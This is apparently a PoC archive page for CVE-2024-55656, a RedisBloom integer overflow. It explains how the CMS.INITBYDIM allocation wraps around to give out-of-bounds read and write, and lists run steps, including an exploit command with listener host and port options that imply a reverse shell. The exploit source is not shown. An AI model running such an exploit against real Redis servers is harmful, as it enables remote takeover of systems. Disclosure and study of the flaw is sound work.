Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-55656 PoC — RedisBloom Integer Overflow Remote Code Execution Vulnerability

Source
https://github.com/rick2600/redis-stack-CVE-2024-55656
Associated Vulnerability
Title:RedisBloom Integer Overflow Remote Code Execution Vulnerability (CVE-2024-55656)
Description:RedisBloom adds a set of probabilistic data structures to Redis. There is an integer overflow vulnerability in RedisBloom, which is a module used in Redis. The integer overflow vulnerability allows an attacker (a redis client which knows the password) to allocate memory in the heap lesser than the required memory due to wraparound. Then read and write can be performed beyond this allocated memory, leading to info leak and OOB write. The integer overflow is in CMS.INITBYDIM command, which initialize a Count-Min Sketch to dimensions specified by user. It accepts two values (width and depth) and uses them to allocate memory in NewCMSketch(). This vulnerability is fixed in 2.2.19, 2.4.12, 2.6.14, and 2.8.2.
Readme
### CVE-2024-55656 - Redis Stack - RedisBloom Integer Overflow Remote Code Execution Vulnerability

* Title: Redis Stack RedisBloom Integer Overflow Remote Code Execution Vulnerability
* ZDI: ZDI-25-009
* CVE: CVE-2024-55656
* Credits: rick2600 and gqsilva
* CVSS: 8.8 (HIGH)
* Affected version: RedisBloom v2.6.12 shipped with Redis Stack 7.2.0-v10

### Analysis (Short Version)
There is an integer overflow vulnerability in RedisBloom (https://github.com/RedisBloom/RedisBloom), which is a module used in redis (https://redis.io/docs/latest/develop/data-types/probabilistic/bloom-filter/). The integer overflow vulnerability allows an attacker (a redis client which knows the password) to allocate memory in the heap lesser than the required memory due to wraparound. Then read and write can be performed beyond this allocated memory, leading to info leak and OOB write.

The integer overflow is in CMS.INITBYDIM command, which initialize a Count-Min Sketch to dimensions specified by user. It accepts two values (width and depth) and uses them to allocate memory in NewCMSketch()

File: src/cms.c

```c
CMSketch *NewCMSketch(size_t width, size_t depth) {
    assert(width > 0);
    assert(depth > 0);

    CMSketch *cms = CMS_CALLOC(1, sizeof(CMSketch));

    cms->width = width;
    cms->depth = depth;
    cms->counter = 0;
    cms->array = CMS_CALLOC(width * depth, sizeof(uint32_t));

    return cms;
}
```

OOB read is achieved through CMS.QUERY command implemented in CMS_Query(). 

OOB write is achieved through CMS.INCRBY command implemented in CMS_IncrBy().

For full analysis check the [advisory](https://github.com/RedisBloom/RedisBloom/security/advisories/GHSA-x5rx-rmq3-ff3h)

### Proof-of-Concept

1. Start redis-stack
   
`docker run -p 6379:6379 --name redis-stack redis/redis-stack:7.2.0-v10`

2. Run the exploit
   
`python exploit.py --host 172.17.0.2 --port 6379 --lhost 172.17.0.1 --lport 4444`


### References
1. https://www.zerodayinitiative.com/advisories/ZDI-25-009/
2. https://github.com/RedisBloom/RedisBloom/security/advisories/GHSA-x5rx-rmq3-ff3h
3. https://redis.io/blog/security-advisory-cve-2024-46981-cve-2024-51737-cve-2024-51480-cve-2024-55656/
File Snapshot

 [4.0K]  /data/pocs/e5e7f0a155ae0ed028ff3c5f04e9a2b578267492
├── [4.0K]  exploit
│   ├── [ 10K]  exploit.py
│   └── [ 12K]  murmurhash2_1024.json
└── [2.1K]  README.md

1 directory, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →